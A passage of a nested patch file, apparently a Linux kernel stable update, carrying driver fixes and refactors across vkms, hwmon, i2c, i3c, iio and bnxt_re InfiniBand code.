++	out_pixel->r = le16_to_cpu(pixels[2]);
++	out_pixel->g = le16_to_cpu(pixels[1]);
++	out_pixel->b = le16_to_cpu(pixels[0]);
+ }
+ 
+-static void RGB565_to_argb_u16(struct line_buffer *stage_buffer,
+-			       const struct vkms_frame_info *frame_info, int y)
++static void RGB565_to_argb_u16(u8 *src_pixels, struct pixel_argb_u16 *out_pixel)
+ {
+-	struct pixel_argb_u16 *out_pixels = stage_buffer->pixels;
+-	u16 *src_pixels = get_packed_src_addr(frame_info, y);
+-	int x_limit = min_t(size_t, drm_rect_width(&frame_info->dst),
+-			       stage_buffer->n_pixels);
++	u16 *pixels = (u16 *)src_pixels;
+ 
+ 	s64 fp_rb_ratio = drm_fixp_div(drm_int2fixp(65535), drm_int2fixp(31));
+ 	s64 fp_g_ratio = drm_fixp_div(drm_int2fixp(65535), drm_int2fixp(63));
+ 
+-	for (size_t x = 0; x < x_limit; x++, src_pixels++) {
+-		u16 rgb_565 = le16_to_cpu(*src_pixels);
+-		s64 fp_r = drm_int2fixp((rgb_565 >> 11) & 0x1f);
+-		s64 fp_g = drm_int2fixp((rgb_565 >> 5) & 0x3f);
+-		s64 fp_b = drm_int2fixp(rgb_565 & 0x1f);
++	u16 rgb_565 = le16_to_cpu(*pixels);
++	s64 fp_r = drm_int2fixp((rgb_565 >> 11) & 0x1f);
++	s64 fp_g = drm_int2fixp((rgb_565 >> 5) & 0x3f);
++	s64 fp_b = drm_int2fixp(rgb_565 & 0x1f);
+ 
+-		out_pixels[x].a = (u16)0xffff;
+-		out_pixels[x].r = drm_fixp2int(drm_fixp_mul(fp_r, fp_rb_ratio));
+-		out_pixels[x].g = drm_fixp2int(drm_fixp_mul(fp_g, fp_g_ratio));
+-		out_pixels[x].b = drm_fixp2int(drm_fixp_mul(fp_b, fp_rb_ratio));
+-	}
++	out_pixel->a = (u16)0xffff;
++	out_pixel->r = drm_fixp2int_round(drm_fixp_mul(fp_r, fp_rb_ratio));
++	out_pixel->g = drm_fixp2int_round(drm_fixp_mul(fp_g, fp_g_ratio));
++	out_pixel->b = drm_fixp2int_round(drm_fixp_mul(fp_b, fp_rb_ratio));
++}
++
++void vkms_compose_row(struct line_buffer *stage_buffer, struct vkms_plane_state *plane, int y)
++{
++	struct pixel_argb_u16 *out_pixels = stage_buffer->pixels;
++	struct vkms_frame_info *frame_info = plane->frame_info;
++	u8 *src_pixels = get_packed_src_addr(frame_info, y);
++	int limit = min_t(size_t, drm_rect_width(&frame_info->dst), stage_buffer->n_pixels);
++
++	for (size_t x = 0; x < limit; x++, src_pixels += frame_info->cpp)
++		plane->pixel_read(src_pixels, &out_pixels[x]);
+ }
+ 
+ /*
+@@ -241,15 +216,15 @@ static void argb_u16_to_RGB565(struct vkms_frame_info *frame_info,
+ 		s64 fp_g = drm_int2fixp(in_pixels[x].g);
+ 		s64 fp_b = drm_int2fixp(in_pixels[x].b);
+ 
+-		u16 r = drm_fixp2int(drm_fixp_div(fp_r, fp_rb_ratio));
+-		u16 g = drm_fixp2int(drm_fixp_div(fp_g, fp_g_ratio));
+-		u16 b = drm_fixp2int(drm_fixp_div(fp_b, fp_rb_ratio));
++		u16 r = drm_fixp2int_round(drm_fixp_div(fp_r, fp_rb_ratio));
++		u16 g = drm_fixp2int_round(drm_fixp_div(fp_g, fp_g_ratio));
++		u16 b = drm_fixp2int_round(drm_fixp_div(fp_b, fp_rb_ratio));
+ 
+ 		*dst_pixels = cpu_to_le16(r << 11 | g << 5 | b);
+ 	}
+ }
+ 
+-void *get_frame_to_line_function(u32 format)
++void *get_pixel_conversion_function(u32 format)
+ {
+ 	switch (format) {
+ 	case DRM_FORMAT_ARGB8888:
+diff --git a/drivers/gpu/drm/vkms/vkms_formats.h b/drivers/gpu/drm/vkms/vkms_formats.h
+index 43b7c19790181..c5b113495d0c0 100644
+--- a/drivers/gpu/drm/vkms/vkms_formats.h
++++ b/drivers/gpu/drm/vkms/vkms_formats.h
+@@ -5,7 +5,7 @@
+ 
+ #include "vkms_drv.h"
+ 
+-void *get_frame_to_line_function(u32 format);
++void *get_pixel_conversion_function(u32 format);
+ 
+ void *get_line_to_frame_function(u32 format);
+ 
+diff --git a/drivers/gpu/drm/vkms/vkms_plane.c b/drivers/gpu/drm/vkms/vkms_plane.c
+index c3a845220e10c..80e964589cecb 100644
+--- a/drivers/gpu/drm/vkms/vkms_plane.c
++++ b/drivers/gpu/drm/vkms/vkms_plane.c
+@@ -123,7 +123,7 @@ static void vkms_plane_atomic_update(struct drm_plane *plane,
+ 	frame_info->offset = fb->offsets[0];
+ 	frame_info->pitch = fb->pitches[0];
+ 	frame_info->cpp = fb->format->cpp[0];
+-	vkms_plane_state->plane_read = get_frame_to_line_function(fmt);
++	vkms_plane_state->pixel_read = get_pixel_conversion_function(fmt);
+ }
+ 
+ static int vkms_plane_atomic_check(struct drm_plane *plane,
+diff --git a/drivers/hid/Kconfig b/drivers/hid/Kconfig
+index 185a077d59cdd..c1873ccc7248d 100644
+--- a/drivers/hid/Kconfig
++++ b/drivers/hid/Kconfig
+@@ -1262,7 +1262,7 @@ config HID_MCP2221
+ 
+ config HID_KUNIT_TEST
+ 	tristate "KUnit tests for HID" if !KUNIT_ALL_TESTS
+-	depends on KUNIT=y
++	depends on KUNIT
+ 	depends on HID_UCLOGIC
+ 	default KUNIT_ALL_TESTS
+ 	help
+diff --git a/drivers/hwmon/f71882fg.c b/drivers/hwmon/f71882fg.c
+index 70121482a6173..27207ec6f7feb 100644
+--- a/drivers/hwmon/f71882fg.c
++++ b/drivers/hwmon/f71882fg.c
+@@ -1096,8 +1096,11 @@ static ssize_t show_pwm(struct device *dev,
+ 		val = data->pwm[nr];
+ 	else {
+ 		/* RPM mode */
+-		val = 255 * fan_from_reg(data->fan_target[nr])
+-			/ fan_from_reg(data->fan_full_speed[nr]);
++		if (fan_from_reg(data->fan_full_speed[nr]))
++			val = 255 * fan_from_reg(data->fan_target[nr])
++				/ fan_from_reg(data->fan_full_speed[nr]);
++		else
++			val = 0;
+ 	}
+ 	mutex_unlock(&data->update_lock);
+ 	return sprintf(buf, "%d\n", val);
+diff --git a/drivers/hwmon/gsc-hwmon.c b/drivers/hwmon/gsc-hwmon.c
+index b60ec95b5edbf..74bfc21c2767b 100644
+--- a/drivers/hwmon/gsc-hwmon.c
++++ b/drivers/hwmon/gsc-hwmon.c
+@@ -82,8 +82,8 @@ static ssize_t pwm_auto_point_temp_store(struct device *dev,
+ 	if (kstrtol(buf, 10, &temp))
+ 		return -EINVAL;
+ 
+-	temp = clamp_val(temp, 0, 10000);
+-	temp = DIV_ROUND_CLOSEST(temp, 10);
++	temp = clamp_val(temp, 0, 100000);
++	temp = DIV_ROUND_CLOSEST(temp, 100);
+ 
+ 	regs[0] = temp & 0xff;
+ 	regs[1] = (temp >> 8) & 0xff;
+@@ -100,7 +100,7 @@ static ssize_t pwm_auto_point_pwm_show(struct device *dev,
+ {
+ 	struct sensor_device_attribute *attr = to_sensor_dev_attr(devattr);
+ 
+-	return sprintf(buf, "%d\n", 255 * (50 + (attr->index * 10)) / 100);
++	return sprintf(buf, "%d\n", 255 * (50 + (attr->index * 10)));
+ }
+ 
+ static SENSOR_DEVICE_ATTR_RO(pwm1_auto_point1_pwm, pwm_auto_point_pwm, 0);
+diff --git a/drivers/hwmon/pmbus/adm1275.c b/drivers/hwmon/pmbus/adm1275.c
+index 3b07bfb43e937..b8543c06d022a 100644
+--- a/drivers/hwmon/pmbus/adm1275.c
++++ b/drivers/hwmon/pmbus/adm1275.c
+@@ -37,10 +37,13 @@ enum chips { adm1075, adm1272, adm1275, adm1276, adm1278, adm1293, adm1294 };
+ 
+ #define ADM1272_IRANGE			BIT(0)
+ 
++#define ADM1278_TSFILT			BIT(15)
+ #define ADM1278_TEMP1_EN		BIT(3)
+ #define ADM1278_VIN_EN			BIT(2)
+ #define ADM1278_VOUT_EN			BIT(1)
+ 
++#define ADM1278_PMON_DEFCONFIG		(ADM1278_VOUT_EN | ADM1278_TEMP1_EN | ADM1278_TSFILT)
++
+ #define ADM1293_IRANGE_25		0
+ #define ADM1293_IRANGE_50		BIT(6)
+ #define ADM1293_IRANGE_100		BIT(7)
+@@ -462,6 +465,22 @@ static const struct i2c_device_id adm1275_id[] = {
+ };
+ MODULE_DEVICE_TABLE(i2c, adm1275_id);
+ 
++/* Enable VOUT & TEMP1 if not enabled (disabled by default) */
++static int adm1275_enable_vout_temp(struct i2c_client *client, int config)
++{
++	int ret;
++
++	if ((config & ADM1278_PMON_DEFCONFIG) != ADM1278_PMON_DEFCONFIG) {
++		config |= ADM1278_PMON_DEFCONFIG;
++		ret = i2c_smbus_write_word_data(client, ADM1275_PMON_CONFIG, config);
++		if (ret < 0) {
++			dev_err(&client->dev, "Failed to enable VOUT/TEMP1 monitoring\n");
++			return ret;
++		}
++	}
++	return 0;
++}
++
+ static int adm1275_probe(struct i2c_client *client)
+ {
+ 	s32 (*config_read_fn)(const struct i2c_client *client, u8 reg);
+@@ -615,19 +634,10 @@ static int adm1275_probe(struct i2c_client *client)
+ 			PMBUS_HAVE_VOUT | PMBUS_HAVE_STATUS_VOUT |
+ 			PMBUS_HAVE_TEMP | PMBUS_HAVE_STATUS_TEMP;
+ 
+-		/* Enable VOUT & TEMP1 if not enabled (disabled by default) */
+-		if ((config & (ADM1278_VOUT_EN | ADM1278_TEMP1_EN)) !=
+-		    (ADM1278_VOUT_EN | ADM1278_TEMP1_EN)) {
+-			config |= ADM1278_VOUT_EN | ADM1278_TEMP1_EN;
+-			ret = i2c_smbus_write_byte_data(client,
+-							ADM1275_PMON_CONFIG,
+-							config);
+-			if (ret < 0) {
+-				dev_err(&client->dev,
+-					"Failed to enable VOUT monitoring\n");
+-				return -ENODEV;
+-			}
+-		}
++		ret = adm1275_enable_vout_temp(client, config);
++		if (ret)
++			return ret;
++
+ 		if (config & ADM1278_VIN_EN)
+ 			info->func[0] |= PMBUS_HAVE_VIN;
+ 		break;
+@@ -684,19 +694,9 @@ static int adm1275_probe(struct i2c_client *client)
+ 			PMBUS_HAVE_VOUT | PMBUS_HAVE_STATUS_VOUT |
+ 			PMBUS_HAVE_TEMP | PMBUS_HAVE_STATUS_TEMP;
+ 
+-		/* Enable VOUT & TEMP1 if not enabled (disabled by default) */
+-		if ((config & (ADM1278_VOUT_EN | ADM1278_TEMP1_EN)) !=
+-		    (ADM1278_VOUT_EN | ADM1278_TEMP1_EN)) {
+-			config |= ADM1278_VOUT_EN | ADM1278_TEMP1_EN;
+-			ret = i2c_smbus_write_word_data(client,
+-							ADM1275_PMON_CONFIG,
+-							config);
+-			if (ret < 0) {
+-				dev_err(&client->dev,
+-					"Failed to enable VOUT monitoring\n");
+-				return -ENODEV;
+-			}
+-		}
++		ret = adm1275_enable_vout_temp(client, config);
++		if (ret)
++			return ret;
+ 
+ 		if (config & ADM1278_VIN_EN)
+ 			info->func[0] |= PMBUS_HAVE_VIN;
+diff --git a/drivers/hwtracing/coresight/coresight-core.c b/drivers/hwtracing/coresight/coresight-core.c
+index f3068175ca9d9..bcb08fadccf21 100644
+--- a/drivers/hwtracing/coresight/coresight-core.c
++++ b/drivers/hwtracing/coresight/coresight-core.c
+@@ -1446,13 +1446,8 @@ static int coresight_remove_match(struct device *dev, void *data)
+ 		if (csdev->dev.fwnode == conn->child_fwnode) {
+ 			iterator->orphan = true;
+ 			coresight_remove_links(iterator, conn);
+-			/*
+-			 * Drop the reference to the handle for the remote
+-			 * device acquired in parsing the connections from
+-			 * platform data.
+-			 */
+-			fwnode_handle_put(conn->child_fwnode);
+-			conn->child_fwnode = NULL;
++
++			conn->child_dev = NULL;
+ 			/* No need to continue */
+ 			break;
+ 		}
+diff --git a/drivers/hwtracing/ptt/hisi_ptt.c b/drivers/hwtracing/ptt/hisi_ptt.c
+index 30f1525639b57..4140efd664097 100644
+--- a/drivers/hwtracing/ptt/hisi_ptt.c
++++ b/drivers/hwtracing/ptt/hisi_ptt.c
+@@ -341,13 +341,13 @@ static int hisi_ptt_register_irq(struct hisi_ptt *hisi_ptt)
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	ret = devm_request_threaded_irq(&pdev->dev,
+-					pci_irq_vector(pdev, HISI_PTT_TRACE_DMA_IRQ),
++	hisi_ptt->trace_irq = pci_irq_vector(pdev, HISI_PTT_TRACE_DMA_IRQ);
++	ret = devm_request_threaded_irq(&pdev->dev, hisi_ptt->trace_irq,
+ 					NULL, hisi_ptt_isr, 0,
+ 					DRV_NAME, hisi_ptt);
+ 	if (ret) {
+ 		pci_err(pdev, "failed to request irq %d, ret = %d\n",
+-			pci_irq_vector(pdev, HISI_PTT_TRACE_DMA_IRQ), ret);
++			hisi_ptt->trace_irq, ret);
+ 		return ret;
+ 	}
+ 
+@@ -757,8 +757,7 @@ static void hisi_ptt_pmu_start(struct perf_event *event, int flags)
+ 	 * core in event_function_local(). If CPU passed is offline we'll fail
+ 	 * here, just log it since we can do nothing here.
+ 	 */
+-	ret = irq_set_affinity(pci_irq_vector(hisi_ptt->pdev, HISI_PTT_TRACE_DMA_IRQ),
+-					      cpumask_of(cpu));
++	ret = irq_set_affinity(hisi_ptt->trace_irq, cpumask_of(cpu));
+ 	if (ret)
+ 		dev_warn(dev, "failed to set the affinity of trace interrupt\n");
+ 
+@@ -1018,8 +1017,7 @@ static int hisi_ptt_cpu_teardown(unsigned int cpu, struct hlist_node *node)
+ 	 * Also make sure the interrupt bind to the migrated CPU as well. Warn
+ 	 * the user on failure here.
+ 	 */
+-	if (irq_set_affinity(pci_irq_vector(hisi_ptt->pdev, HISI_PTT_TRACE_DMA_IRQ),
+-					    cpumask_of(target)))
++	if (irq_set_affinity(hisi_ptt->trace_irq, cpumask_of(target)))
+ 		dev_warn(dev, "failed to set the affinity of trace interrupt\n");
+ 
+ 	hisi_ptt->trace_ctrl.on_cpu = target;
+diff --git a/drivers/hwtracing/ptt/hisi_ptt.h b/drivers/hwtracing/ptt/hisi_ptt.h
+index 5beb1648c93ab..948a4c4231527 100644
+--- a/drivers/hwtracing/ptt/hisi_ptt.h
++++ b/drivers/hwtracing/ptt/hisi_ptt.h
+@@ -166,6 +166,7 @@ struct hisi_ptt_pmu_buf {
+  * @pdev:         pci_dev of this PTT device
+  * @tune_lock:    lock to serialize the tune process
+  * @pmu_lock:     lock to serialize the perf process
++ * @trace_irq:    interrupt number used by trace
+  * @upper_bdf:    the upper BDF range of the PCI devices managed by this PTT device
+  * @lower_bdf:    the lower BDF range of the PCI devices managed by this PTT device
+  * @port_filters: the filter list of root ports
+@@ -180,6 +181,7 @@ struct hisi_ptt {
+ 	struct pci_dev *pdev;
+ 	struct mutex tune_lock;
+ 	spinlock_t pmu_lock;
++	int trace_irq;
+ 	u32 upper_bdf;
+ 	u32 lower_bdf;
+ 
+diff --git a/drivers/i2c/busses/i2c-designware-pcidrv.c b/drivers/i2c/busses/i2c-designware-pcidrv.c
+index 782fe1ef3ca10..61d7a27aa0701 100644
+--- a/drivers/i2c/busses/i2c-designware-pcidrv.c
++++ b/drivers/i2c/busses/i2c-designware-pcidrv.c
+@@ -20,6 +20,7 @@
+ #include <linux/module.h>
+ #include <linux/pci.h>
+ #include <linux/pm_runtime.h>
++#include <linux/power_supply.h>
+ #include <linux/sched.h>
+ #include <linux/slab.h>
+ 
+@@ -234,6 +235,16 @@ static const struct dev_pm_ops i2c_dw_pm_ops = {
+ 	SET_RUNTIME_PM_OPS(i2c_dw_pci_runtime_suspend, i2c_dw_pci_runtime_resume, NULL)
+ };
+ 
++static const struct property_entry dgpu_properties[] = {
++	/* USB-C doesn't power the system */
++	PROPERTY_ENTRY_U8("scope", POWER_SUPPLY_SCOPE_DEVICE),
++	{}
++};
++
++static const struct software_node dgpu_node = {
++	.properties = dgpu_properties,
++};
++
+ static int i2c_dw_pci_probe(struct pci_dev *pdev,
+ 			    const struct pci_device_id *id)
+ {
+@@ -325,7 +336,7 @@ static int i2c_dw_pci_probe(struct pci_dev *pdev,
+ 	}
+ 
+ 	if ((dev->flags & MODEL_MASK) == MODEL_AMD_NAVI_GPU) {
+-		dev->slave = i2c_new_ccgx_ucsi(&dev->adapter, dev->irq, NULL);
++		dev->slave = i2c_new_ccgx_ucsi(&dev->adapter, dev->irq, &dgpu_node);
+ 		if (IS_ERR(dev->slave))
+ 			return dev_err_probe(dev->dev, PTR_ERR(dev->slave),
+ 					     "register UCSI failed\n");
+diff --git a/drivers/i2c/busses/i2c-nvidia-gpu.c b/drivers/i2c/busses/i2c-nvidia-gpu.c
+index 12e330cd7635b..26622d24bb1b2 100644
+--- a/drivers/i2c/busses/i2c-nvidia-gpu.c
++++ b/drivers/i2c/busses/i2c-nvidia-gpu.c
+@@ -14,6 +14,7 @@
+ #include <linux/platform_device.h>
+ #include <linux/pm.h>
+ #include <linux/pm_runtime.h>
++#include <linux/power_supply.h>
+ 
+ #include <asm/unaligned.h>
+ 
+@@ -259,8 +260,10 @@ static const struct pci_device_id gpu_i2c_ids[] = {
+ MODULE_DEVICE_TABLE(pci, gpu_i2c_ids);
+ 
+ static const struct property_entry ccgx_props[] = {
+-	/* Use FW built for NVIDIA (nv) only */
+-	PROPERTY_ENTRY_U16("ccgx,firmware-build", ('n' << 8) | 'v'),
++	/* Use FW built for NVIDIA GPU only */
++	PROPERTY_ENTRY_STRING("firmware-name", "nvidia,gpu"),
++	/* USB-C doesn't power the system */
++	PROPERTY_ENTRY_U8("scope", POWER_SUPPLY_SCOPE_DEVICE),
+ 	{ }
+ };
+ 
+diff --git a/drivers/i2c/busses/i2c-qup.c b/drivers/i2c/busses/i2c-qup.c
+index 2e153f2f71b6d..78682388e02ed 100644
+--- a/drivers/i2c/busses/i2c-qup.c
++++ b/drivers/i2c/busses/i2c-qup.c
+@@ -1752,16 +1752,21 @@ nodma:
+ 	if (!clk_freq || clk_freq > I2C_MAX_FAST_MODE_PLUS_FREQ) {
+ 		dev_err(qup->dev, "clock frequency not supported %d\n",
+ 			clk_freq);
+-		return -EINVAL;
++		ret = -EINVAL;
++		goto fail_dma;
+ 	}
+ 
+ 	qup->base = devm_platform_ioremap_resource(pdev, 0);
+-	if (IS_ERR(qup->base))
+-		return PTR_ERR(qup->base);
++	if (IS_ERR(qup->base)) {
++		ret = PTR_ERR(qup->base);
++		goto fail_dma;
++	}
+ 
+ 	qup->irq = platform_get_irq(pdev, 0);
+-	if (qup->irq < 0)
+-		return qup->irq;
++	if (qup->irq < 0) {
++		ret = qup->irq;
++		goto fail_dma;
++	}
+ 
+ 	if (has_acpi_companion(qup->dev)) {
+ 		ret = device_property_read_u32(qup->dev,
+@@ -1775,13 +1780,15 @@ nodma:
+ 		qup->clk = devm_clk_get(qup->dev, "core");
+ 		if (IS_ERR(qup->clk)) {
+ 			dev_err(qup->dev, "Could not get core clock\n");
+-			return PTR_ERR(qup->clk);
++			ret = PTR_ERR(qup->clk);
++			goto fail_dma;
+ 		}
+ 
+ 		qup->pclk = devm_clk_get(qup->dev, "iface");
+ 		if (IS_ERR(qup->pclk)) {
+ 			dev_err(qup->dev, "Could not get iface clock\n");
+-			return PTR_ERR(qup->pclk);
++			ret = PTR_ERR(qup->pclk);
++			goto fail_dma;
+ 		}
+ 		qup_i2c_enable_clocks(qup);
+ 		src_clk_freq = clk_get_rate(qup->clk);
+diff --git a/drivers/i2c/busses/i2c-xiic.c b/drivers/i2c/busses/i2c-xiic.c
+index effae4d467291..b41a6709e47f2 100644
+--- a/drivers/i2c/busses/i2c-xiic.c
++++ b/drivers/i2c/busses/i2c-xiic.c
+@@ -431,6 +431,8 @@ static irqreturn_t xiic_process(int irq, void *dev_id)
+ 			wakeup_req = 1;
+ 			wakeup_code = STATE_ERROR;
+ 		}
++		/* don't try to handle other events */
++		goto out;
+ 	}
+ 	if (pend & XIIC_INTR_RX_FULL_MASK) {
+ 		/* Receive register/FIFO is full */
+diff --git a/drivers/i3c/master/svc-i3c-master.c b/drivers/i3c/master/svc-i3c-master.c
+index d6e9ed74cdcf4..d47360f8a1f36 100644
+--- a/drivers/i3c/master/svc-i3c-master.c
++++ b/drivers/i3c/master/svc-i3c-master.c
+@@ -1090,12 +1090,6 @@ static void svc_i3c_master_start_xfer_locked(struct svc_i3c_master *master)
+ 	if (!xfer)
+ 		return;
+ 
+-	ret = pm_runtime_resume_and_get(master->dev);
+-	if (ret < 0) {
+-		dev_err(master->dev, "<%s> Cannot get runtime PM.\n", __func__);
+-		return;
+-	}
+-
+ 	svc_i3c_master_clear_merrwarn(master);
+ 	svc_i3c_master_flush_fifo(master);
+ 
+@@ -1110,9 +1104,6 @@ static void svc_i3c_master_start_xfer_locked(struct svc_i3c_master *master)
+ 			break;
+ 	}
+ 
+-	pm_runtime_mark_last_busy(master->dev);
+-	pm_runtime_put_autosuspend(master->dev);
+-
+ 	xfer->ret = ret;
+ 	complete(&xfer->comp);
+ 
+@@ -1133,6 +1124,13 @@ static void svc_i3c_master_enqueue_xfer(struct svc_i3c_master *master,
+ 					struct svc_i3c_xfer *xfer)
+ {
+ 	unsigned long flags;
++	int ret;
++
++	ret = pm_runtime_resume_and_get(master->dev);
++	if (ret < 0) {
++		dev_err(master->dev, "<%s> Cannot get runtime PM.\n", __func__);
++		return;
++	}
+ 
+ 	init_completion(&xfer->comp);
+ 	spin_lock_irqsave(&master->xferqueue.lock, flags);
+@@ -1143,6 +1141,9 @@ static void svc_i3c_master_enqueue_xfer(struct svc_i3c_master *master,
+ 		svc_i3c_master_start_xfer_locked(master);
+ 	}
+ 	spin_unlock_irqrestore(&master->xferqueue.lock, flags);
++
++	pm_runtime_mark_last_busy(master->dev);
++	pm_runtime_put_autosuspend(master->dev);
+ }
+ 
+ static bool
+diff --git a/drivers/iio/accel/fxls8962af-core.c b/drivers/iio/accel/fxls8962af-core.c
+index 8874d6d617253..8bc516a57e358 100644
+--- a/drivers/iio/accel/fxls8962af-core.c
++++ b/drivers/iio/accel/fxls8962af-core.c
+@@ -725,8 +725,7 @@ static const struct iio_event_spec fxls8962af_event[] = {
+ 		.sign = 's', \
+ 		.realbits = 12, \
+ 		.storagebits = 16, \
+-		.shift = 4, \
+-		.endianness = IIO_BE, \
++		.endianness = IIO_LE, \
+ 	}, \
+ 	.event_spec = fxls8962af_event, \
+ 	.num_event_specs = ARRAY_SIZE(fxls8962af_event), \
+@@ -905,9 +904,10 @@ static int fxls8962af_fifo_transfer(struct fxls8962af_data *data,
+ 	int total_length = samples * sample_length;
+ 	int ret;
+ 
+-	if (i2c_verify_client(dev))
++	if (i2c_verify_client(dev) &&
++	    data->chip_info->chip_id == FXLS8962AF_DEVICE_ID)
+ 		/*
+-		 * Due to errata bug:
++		 * Due to errata bug (only applicable on fxls8962af):
+ 		 * E3: FIFO burst read operation error using I2C interface
+ 		 * We have to avoid burst reads on I2C..
+ 		 */
+diff --git a/drivers/iio/adc/ad7192.c b/drivers/iio/adc/ad7192.c
+index a8f6fa48daa8e..8720ac43a4a4a 100644
+--- a/drivers/iio/adc/ad7192.c
++++ b/drivers/iio/adc/ad7192.c
+@@ -368,7 +368,7 @@ static int ad7192_of_clock_select(struct ad7192_state *st)
+ 	clock_sel = AD7192_CLK_INT;
+ 
+ 	/* use internal clock */
+-	if (st->mclk) {
++	if (!st->mclk) {
+ 		if (of_property_read_bool(np, "adi,int-clock-output-enable"))
+ 			clock_sel = AD7192_CLK_INT_CO;
+ 	} else {
+@@ -381,9 +381,9 @@ static int ad7192_of_clock_select(struct ad7192_state *st)
+ 	return clock_sel;
+ }
+ 
+-static int ad7192_setup(struct ad7192_state *st, struct device_node *np)
++static int ad7192_setup(struct iio_dev *indio_dev, struct device_node *np)
+ {
+-	struct iio_dev *indio_dev = spi_get_drvdata(st->sd.spi);
++	struct ad7192_state *st = iio_priv(indio_dev);
+ 	bool rej60_en, refin2_en;
+ 	bool buf_en, bipolar, burnout_curr_en;
+ 	unsigned long long scale_uv;
+@@ -1078,7 +1078,7 @@ static int ad7192_probe(struct spi_device *spi)
+ 		}
+ 	}
+ 
+-	ret = ad7192_setup(st, spi->dev.of_node);
++	ret = ad7192_setup(indio_dev, spi->dev.of_node);
+ 	if (ret)
+ 		return ret;
+ 
+diff --git a/drivers/infiniband/hw/bnxt_re/main.c b/drivers/infiniband/hw/bnxt_re/main.c
+index 8c0c80a8d3384..e58893387bb4d 100644
+--- a/drivers/infiniband/hw/bnxt_re/main.c
++++ b/drivers/infiniband/hw/bnxt_re/main.c
+@@ -333,15 +333,21 @@ static void bnxt_re_start_irq(void *handle, struct bnxt_msix_entry *ent)
+ 	for (indx = 0; indx < rdev->num_msix; indx++)
+ 		rdev->msix_entries[indx].vector = ent[indx].vector;
+ 
+-	bnxt_qplib_rcfw_start_irq(rcfw, msix_ent[BNXT_RE_AEQ_IDX].vector,
+-				  false);
++	rc = bnxt_qplib_rcfw_start_irq(rcfw, msix_ent[BNXT_RE_AEQ_IDX].vector,
++				       false);
++	if (rc) {
++		ibdev_warn(&rdev->ibdev, "Failed to reinit CREQ\n");
++		return;
++	}
+ 	for (indx = BNXT_RE_NQ_IDX ; indx < rdev->num_msix; indx++) {
+ 		nq = &rdev->nq[indx - 1];
+ 		rc = bnxt_qplib_nq_start_irq(nq, indx - 1,
+ 					     msix_ent[indx].vector, false);
+-		if (rc)
++		if (rc) {
+ 			ibdev_warn(&rdev->ibdev, "Failed to reinit NQ index %d\n",
+ 				   indx - 1);
++			return;
++		}
+ 	}
+ }
+ 
+@@ -1176,12 +1182,6 @@ static int bnxt_re_update_gid(struct bnxt_re_dev *rdev)
+ 	if (!ib_device_try_get(&rdev->ibdev))
+ 		return 0;
+ 
+-	if (!sgid_tbl) {
+-		ibdev_err(&rdev->ibdev, "QPLIB: SGID table not allocated");
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+ 	for (index = 0; index < sgid_tbl->active; index++) {
+ 		gid_idx = sgid_tbl->hw_id[index];
+ 
+@@ -1199,7 +1199,7 @@ static int bnxt_re_update_gid(struct bnxt_re_dev *rdev)
+ 		rc = bnxt_qplib_update_sgid(sgid_tbl, &gid, gid_idx,
+ 					    rdev->qplib_res.netdev->dev_addr);
+ 	}
+-out:
++
+ 	ib_device_put(&rdev->ibdev);
+ 	return rc;
+ }
+diff --git a/drivers/infiniband/hw/bnxt_re/qplib_fp.c b/drivers/infiniband/hw/bnxt_re/qplib_fp.c
+index ab2cc1c67f70b..74d56900387a1 100644
+--- a/drivers/infiniband/hw/bnxt_re/qplib_fp.c
++++ b/drivers/infiniband/hw/bnxt_re/qplib_fp.c
+@@ -405,6 +405,9 @@ static irqreturn_t bnxt_qplib_nq_irq(int irq, void *dev_instance)
+ 
+ void bnxt_qplib_nq_stop_irq(struct bnxt_qplib_nq *nq, bool kill)
+ {
++	if (!nq->requested)
++		return;
++
+ 	tasklet_disable(&nq->nq_tasklet);
+ 	/* Mask h/w interrupt */
+ 	bnxt_qplib_ring_nq_db(&nq->nq_db.dbinfo, nq->res->cctx, false);
+@@ -412,11 +415,12 @@ void bnxt_qplib_nq_stop_irq(struct bnxt_qplib_nq *nq, bool kill)
+ 	synchronize_irq(nq->msix_vec);
+ 	if (kill)
+ 		tasklet_kill(&nq->nq_tasklet);
+-	if (nq->requested) {
+-		irq_set_affinity_hint(nq->msix_vec, NULL);
+-		free_irq(nq->msix_vec, nq);
+-		nq->requested = false;
+-	}
++
++	irq_set_affinity_hint(nq->msix_vec, NULL);
++	free_irq(nq->msix_vec, nq);
++	kfree(nq->name);
++	nq->name = NULL;
++	nq->requested = false;
+ }
+ 
+ void bnxt_qplib_disable_nq(struct bnxt_qplib_nq *nq)
+@@ -442,6 +446,7 @@ void bnxt_qplib_disable_nq(struct bnxt_qplib_nq *nq)
+ int bnxt_qplib_nq_start_irq(struct bnxt_qplib_nq *nq, int nq_indx,
+ 			    int msix_vector, bool need_init)
+ {
++	struct bnxt_qplib_res *res = nq->res;
+ 	int rc;
+ 
+ 	if (nq->requested)
+@@ -453,10 +458,17 @@ int bnxt_qplib_nq_start_irq(struct bnxt_qplib_nq *nq, int nq_indx,
+ 	else
+ 		tasklet_enable(&nq->nq_tasklet);
+ 
+-	snprintf(nq->name, sizeof(nq->name), "bnxt_qplib_nq-%d", nq_indx);
++	nq->name = kasprintf(GFP_KERNEL, "bnxt_re-nq-%d@pci:%s",
++			     nq_indx, pci_name(res->pdev));
++	if (!nq->name)
++		return -ENOMEM;
+ 	rc = request_irq(nq->msix_vec, bnxt_qplib_nq_irq, 0, nq->name, nq);
+-	if (rc)
++	if (rc) {
++		kfree(nq->name);
++		nq->name = NULL;
++		tasklet_disable(&nq->nq_tasklet);
+ 		return rc;
++	}
+ 
+ 	cpumask_clear(&nq->mask);
+ 	cpumask_set_cpu(nq_indx, &nq->mask);
+@@ -467,7 +479,7 @@ int bnxt_qplib_nq_start_irq(struct bnxt_qplib_nq *nq, int nq_indx,
+ 			 nq->msix_vec, nq_indx);
+ 	}
+ 	nq->requested = true;
+-	bnxt_qplib_ring_nq_db(&nq->nq_db.dbinfo, nq->res->cctx, true);
++	bnxt_qplib_ring_nq_db(&nq->nq_db.dbinfo, res->cctx, true);
+ 
+ 	return rc;
+ }
+@@ -1601,7 +1613,7 @@ static int bnxt_qplib_put_inline(struct bnxt_qplib_qp *qp,
+ 		il_src = (void *)wqe->sg_list[indx].addr;
+ 		t_len += len;
+ 		if (t_len > qp->max_inline_data)
+-			goto bad;
++			return -ENOMEM;
+ 		while (len) {
+ 			if (pull_dst) {
+ 				pull_dst = false;
+@@ -1625,8 +1637,6 @@ static int bnxt_qplib_put_inline(struct bnxt_qplib_qp *qp,
+ 	}
+ 
+ 	return t_len;
+-bad:
+-	return -ENOMEM;
+ }
+ 
